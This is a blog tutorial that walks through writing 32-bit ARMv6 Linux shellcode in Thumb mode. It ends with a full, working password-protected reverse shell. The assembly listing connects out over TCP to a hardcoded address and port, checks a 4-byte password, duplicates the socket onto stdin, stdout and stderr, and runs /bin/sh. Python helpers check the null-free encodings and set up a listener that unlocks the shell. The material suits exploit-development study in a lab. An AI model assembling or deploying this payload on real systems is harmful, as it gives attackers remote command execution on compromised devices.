After having written a similar payload for Linux/Intel x64, I was curious about how to apply this knowledge to other architectures, so I decided to go with ARM since it’s an interesting and widespread one.
ARM is a Reduced Instruction Set Computing (RISC) processor architecture that is used everywhere these days: mobile phones, smart thermostats, TVs, Wi-Fi dongles, cars, credit cards, you name it.
Here are some key takeaways:
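In order to switch to Thumb state, we can use the Branch and Exchange instruction (bx) with a destination register whose least significant bit is set to 1. One way to get such a value is to add 1 to the Program Counter (pc register) while in ARM state. Reading pc in ARM state yields the address of the current instruction plus 8, which is the address of the instruction right after the bx that follows.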
<some arm code>
...
// Here we are running on ARM state
add r0, pc, #1
// r0 = pc + 1 (pc itself is not modified; in ARM state it reads as this instruction's address + 8)
bx r0
// Branch & Exchange to the address in r0
// This will make the switch to Thumb state because the LSB of r0 = 1
// From here on we can execute Thumb state instructions!
<some thumb code>
...
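To see why adding 1 to pc lands exactly on the first Thumb instruction, the address arithmetic can be sketched in Python. This is only an illustration, not part of the payload: the helper name `thumb_entry` and the address 0x10000 are made up for the example, and it assumes the add instruction sits at a 4-byte aligned address and is executed in ARM state.

```python
def thumb_entry(add_addr):
    """Model `add r0, pc, #1` followed by `bx r0`, both executed in ARM state.

    Returns (value written to r0, address where Thumb execution starts).
    """
    pc_as_read = add_addr + 8   # ARM state: pc reads as current instruction + 8
    r0 = pc_as_read + 1         # add r0, pc, #1 -> bit 0 set, selects Thumb state
    target = r0 & ~1            # bx uses bit 0 for the state, not for the address
    return r0, target


# Hypothetical layout: add at 0x10000, bx at 0x10004, first Thumb instruction at 0x10008
r0, target = thumb_entry(0x10000)
print(hex(r0), hex(target))     # 0x10009 0x10008
```

The branch target is the instruction right after bx, so no padding is needed between the two ARM instructions and the Thumb code.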
From now on all the coding will be done in Thumb state: its 16-bit instructions make for smaller shellcode and make null bytes easier to avoid.
First of all, we’ll need a lab to run our tests on. Here are some options for it:
1. You can go for the real deal and test the payload on a real Raspberry Pi 1.
2. You can build/run an emulated environment using QEMU. Since I used the QEMU armv6_stretch image from this repo I’d recommend you use the same setup. It pretty much works out of the box, don’t worry.
3. You could download and use the VM provided by Azeria Labs.
So, what are we trying to achieve here? Our goal is to write shellcode for the Linux 32-bit ARMv6 architecture that will connect back to a remote location over TCP/IPv4 and provide a shell only after the remote client provides a valid password. In order to write the payload, we need to chain several syscalls. The exact order is the following: socket, connect, read, dup2 and execve.
Each of these syscalls has a signature we need to respect: certain registers must contain specific values. For example, the r7 register identifies the syscall to execute, so it must always contain the syscall number, while the arguments go in r0, r1, r2 and so on. A whole document containing a full syscall table can be found here.
Photo credit: Webaroo.com.au
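As a quick reference, the register convention can be written down as a small Python sketch. The syscall numbers are the ones used by the payload later in this post; the helper name `register_layout` is just an illustrative choice, not something that exists in any library.

```python
# Syscall numbers used in this post (Linux 32-bit ARM EABI)
SYSCALLS = {"socket": 281, "connect": 283, "read": 3, "dup2": 63, "execve": 11}


def register_layout(name, *args):
    """Return which value each register must hold before issuing `svc`."""
    regs = {"r%d" % i: value for i, value in enumerate(args)}  # arguments: r0, r1, r2...
    regs["r7"] = SYSCALLS[name]                                # syscall number: r7
    return regs


print(register_layout("socket", 2, 1, 0))
# {'r0': 2, 'r1': 1, 'r2': 0, 'r7': 281}
```

After the syscall returns, the result (for example the new socket file descriptor) is found in r0.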
Let’s see an example of how to write a syscall in ARM Thumb state. We’ll use the socket syscall:
// [281] socket(2, 1, 0)
02 20 mov r0, #2 // loads immediate value 2 into r0
01 21 mov r1, #1 // loads immediate value 1 into r1
52 40 eor r2, r2 // zeroes out r2 by XORing it with itself
// 281 does not fit in the 8-bit immediate of a Thumb mov (max 255)
// It must be loaded in parts
c8 27 mov r7, #200 // part 1: loads immediate value 200 into r7
51 37 add r7, #81 // part 2: adds 81 to r7 (200 + 81 = 281, the syscall number)
01 df svc #1 // issues the syscall
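Here you can see that the arguments are loaded into r0, r1 and r2, the syscall number into r7, and the call is issued with svc, all without a single null byte in the encoded instructions.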
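The byte encodings in the listing can be double-checked with a short Python sketch. It hand-encodes only the four 16-bit Thumb instruction forms used above; the helper names (`mov_imm`, `add_imm`, `eor_reg`, `svc`, `encode`) are made up for this example, and a real assembler plus objdump remains the authoritative check.

```python
import struct


def _imm8(value):
    # These Thumb forms only have room for an 8-bit immediate (0..255)
    if not 0 <= value <= 0xFF:
        raise ValueError("immediate %d does not fit in 8 bits" % value)
    return value


def mov_imm(rd, imm):   # mov rd, #imm
    return 0x2000 | (rd << 8) | _imm8(imm)


def add_imm(rd, imm):   # add rd, #imm
    return 0x3000 | (rd << 8) | _imm8(imm)


def eor_reg(rdn, rm):   # eor rdn, rm
    return 0x4040 | (rm << 3) | rdn


def svc(imm):           # svc #imm
    return 0xDF00 | _imm8(imm)


def encode(halfwords):
    # Each Thumb instruction here is one little-endian 16-bit halfword
    return b"".join(struct.pack("<H", h) for h in halfwords)


socket_call = encode([
    mov_imm(0, 2), mov_imm(1, 1), eor_reg(2, 2),
    mov_imm(7, 200), add_imm(7, 81), svc(1),
])
print(socket_call.hex(" "))          # 02 20 01 21 52 40 c8 27 51 37 01 df
print(b"\x00" in socket_call)        # False

# The "obvious" alternatives would introduce null bytes:
print(encode([mov_imm(2, 0)]).hex(" "))  # 00 22
print(encode([svc(0)]).hex(" "))         # 00 df
```

This also illustrates two choices in the listing: r2 is cleared with eor rather than mov r2, #0, and the syscall is issued with svc #1 rather than svc #0, since both alternatives encode with a 0x00 byte.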
Armed with all our knowledge we are now prepared to chain every syscall and put together our payload. The following Gist was extracted from the source code on my main repository:
// Password-Protected Reverse Shell Linux/ARMv6
// Author: Alan Vivona
// medium.syscall59.com
// @syscall59
.section .text
.global _start
_start:
.arm
add r3, pc, #1 // switch to thumb mode
bx r3
.thumb
// [281] socket(2, 1, 0)
mov r0, #2
mov r1, #1
eor r2, r2
mov r7, #200
add r7, #81
svc #1
mov r10, r0 // save sockfd into r10
// [283] connect(socketfd, target, addrlen)
// socket fd is in r0 already
adr r1, target
strb r2, [r1, #1] // replace the 0xff placeholder in the address family field with 0x00
strb r2, [r1, #5] // replace the 1st '255' placeholder of the IP field with a 0
strb r2, [r1, #6] // replace the 2nd '255' placeholder of the IP field with a 0
mov r2, #16
add r7, #2 // 281 + 2 = 283
svc #1
// [003] read(sourcefd, destbuffer, amount)
push {r1}
mov r1, sp
mov r2, #4
mov r7, #3
read_pass:
mov r0, r10
svc #1
check_pass:
ldr r3, pass
ldr r4, [r1]
eor r3, r3, r4
bne read_pass
// [063] dup2(sockfd, stdIO)
mov r1, #2 // r1 = 2 (stderr)
mov r7, #63 // r7 = 63 (dup2)
loop_stdio:
mov r0, r10 // r0 = saved sockfd
svc #1
sub r1,#1
bpl loop_stdio // loop while r1 >= 0
// [011] execve(command, 0, 0)
adr r0, command
eor r2, r2
eor r1, r1
strb r2, [r0, #7]
mov r7, #11
svc #1
// 2-byte alignment fix if needed (can't use a nop as it has a null byte)
// align_bytes : .byte 0xff, 0xff
target:
// The 0xff will be replaced with a null at runtime
.ascii "\x02\xff" // Address family: AF_INET (IPv4), little-endian 16-bit value
.ascii "\x11\x5c" // Port : 4444 (network byte order)
// The '255' will be replaced with a 0 at runtime
.byte 127,255,255,1 // IP: 127.0.0.1.
command: .ascii "/bin/sh?" // The '?' will be replaced with a null at runtime
pass: .ascii "S59!"
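The data at the end of the listing can be sanity-checked from Python. The sketch below replays the three strb patches on the `target` bytes and compares the result with a sockaddr_in prefix built by the standard library, then mimics the 4-byte XOR comparison done in check_pass. The function names are illustrative only, and the little-endian layout is an assumption that matches a typical ARMv6 Linux setup.

```python
import socket
import struct

# Bytes exactly as they appear at the `target` label, placeholders included
RAW_TARGET = b"\x02\xff" + b"\x11\x5c" + bytes([127, 255, 255, 1])


def patch_target(raw):
    """Apply the payload's strb writes: zero the bytes at offsets 1, 5 and 6."""
    buf = bytearray(raw)
    for offset in (1, 5, 6):
        buf[offset] = 0
    return bytes(buf)


def sockaddr_prefix(ip, port):
    """First 8 bytes of a sockaddr_in: family (LE), port (BE), IPv4 address."""
    family = struct.pack("<H", int(socket.AF_INET))
    return family + struct.pack(">H", port) + socket.inet_aton(ip)


def password_ok(received, expected=b"S59!"):
    """Model of check_pass: load both 4-byte words and XOR them."""
    a = struct.unpack("<I", expected)[0]   # ldr r3, pass
    b = struct.unpack("<I", received)[0]   # ldr r4, [r1]
    return (a ^ b) == 0                    # eor r3, r3, r4 / bne read_pass


patched = patch_target(RAW_TARGET)
print(patched.hex())                                    # 0200115c7f000001
print(patched == sockaddr_prefix("127.0.0.1", 4444))    # True
print(password_ok(b"S59!"), password_ok(b"S59?"))       # True False
```

Note that the patch offsets are hard-coded in the payload, so a different IP or port needs its own check for null bytes and, if necessary, its own set of placeholders.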
When testing the payload, keep in mind that it was crafted for Linux 32-bit ARMv6 (the architecture of the Raspberry Pi 1’s CPU). Some tweaks may be needed for it to work on other platforms/architectures. In the following video, you can see the whole process of booting up the QEMU armv6 image, assembling the payload and, finally, the test:
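For the receiving end of a lab test, a plain netcat listener works; an equivalent can also be sketched in a few lines of Python. This is a minimal sketch for a local lab only, assuming the payload connects to 127.0.0.1:4444 and expects the 4 bytes stored at the pass label; `open_listener` and `unlock` are hypothetical helper names.

```python
import socket

PASSWORD = b"S59!"  # the 4 bytes stored at the `pass` label


def open_listener(host="127.0.0.1", port=4444):
    """Bind a TCP listener on the address the payload connects back to."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    return srv


def unlock(srv, password=PASSWORD):
    """Accept one connection and send the password the payload reads."""
    conn, peer = srv.accept()
    conn.sendall(password)
    return conn, peer


# Typical lab usage (blocks until the payload connects):
#   srv = open_listener()
#   conn, peer = unlock(srv)
#   conn.sendall(b"id\n")
#   print(conn.recv(4096).decode())
```

The payload reads 4 bytes at a time and loops until they match, so the password is sent as-is, without a trailing newline.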
That’s all! Hope you enjoyed this one!
The full source code can be found on my GitHub repo and Exploit-DB. Follow me on Twitter and Medium for more content like this!